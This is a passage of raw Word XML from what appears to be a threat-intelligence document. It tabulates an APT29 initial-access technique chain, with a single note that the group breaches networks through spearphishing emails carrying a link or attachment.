                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="298F384F" w14:textId="160730DB" w:rsidR="00F26597" w:rsidRDefault="00AB67D0" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="766FF50E" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26597" w:rsidRPr="00B857D7" w14:paraId="1FE1E17F" w14:textId="77777777" w:rsidTr="00E530D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B8B97CE" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="554B8151" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CACE534" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26597" w:rsidRPr="00B857D7" w14:paraId="32361E4D" w14:textId="77777777" w:rsidTr="00E530D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3794844D" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57A45C88" w14:textId="03B555D7" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>201</w:t>
            </w:r>
            <w:r w:rsidR="00750C90">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="577EB016" w14:textId="3FA24675" w:rsidR="00F26597" w:rsidRDefault="00750C90" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61352F6F" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="00AC7A85" w:rsidRDefault="00F26597" w:rsidP="00F26597"/>
    <w:p w14:paraId="5069AFC2" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00F26597">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10201" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="440"/>
        <w:gridCol w:w="1629"/>
        <w:gridCol w:w="2337"/>
        <w:gridCol w:w="650"/>
        <w:gridCol w:w="591"/>
        <w:gridCol w:w="624"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="2938"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA5C01" w:rsidRPr="002D1D50" w14:paraId="4D4C490F" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="018877AD" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6B63E549" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="72601F9F" w14:textId="6D4349DB" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="56" w:name="OLE_LINK29"/>
            <w:r w:rsidRPr="00235021">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>_00</w:t>
            </w:r>
            <w:r w:rsidR="00BF779A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:bookmarkEnd w:id="56"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6CAA171D" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="54459338" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0C2DA38A" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4DE79097" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="47A2D82E" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B1179F" w:rsidRPr="002D1D50" w14:paraId="3F3C354D" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="029B90F5" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2514A594" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2420D671" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ACF75F5" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23ED07BB" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="574E4E99" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="722A303A" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57890972" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B1179F" w:rsidRPr="002D1D50" w14:paraId="2C205ED0" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03D5B17B" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38065B61" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66EC6BB5" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16ECE5EF" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="193DB9E0" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="701074C1" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="425BFAA9" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DAC0A9F" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="002D1D50" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B1179F" w:rsidRPr="00B857D7" w14:paraId="4191C788" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70E21E5D" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="00B857D7" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DB3B698" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="00B857D7" w:rsidRDefault="00F26597" w:rsidP="00E530D0">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355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6270B2C5" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="00B857D7" w:rsidRDefault="00F26597" w:rsidP="00E530D0">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53" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18870955" w14:textId="31690D99" w:rsidR="00F26597" w:rsidRPr="00B857D7" w:rsidRDefault="00AA5C01" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F7DCC96" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="00B857D7" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="681E4DA3" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="00B857D7" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D955A6D" w14:textId="1359E7E3" w:rsidR="00F26597" w:rsidRPr="00B857D7" w:rsidRDefault="00A41A4B" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E589ADE" w14:textId="77777777" w:rsidR="001B485E" w:rsidRPr="007178A9" w:rsidRDefault="001B485E" w:rsidP="001B485E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="007178A9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The group’s main initial tactic to breach a network is to send </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007178A9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007178A9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> emails that contain a link </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15BAFD3D" w14:textId="283A3FD8" w:rsidR="00F26597" w:rsidRPr="00B857D7" w:rsidRDefault="001B485E" w:rsidP="001B485E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007178A9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>or an attachment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B1179F" w:rsidRPr="00B857D7" w14:paraId="1A2F11E6" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10A072FE" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="00B857D7" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
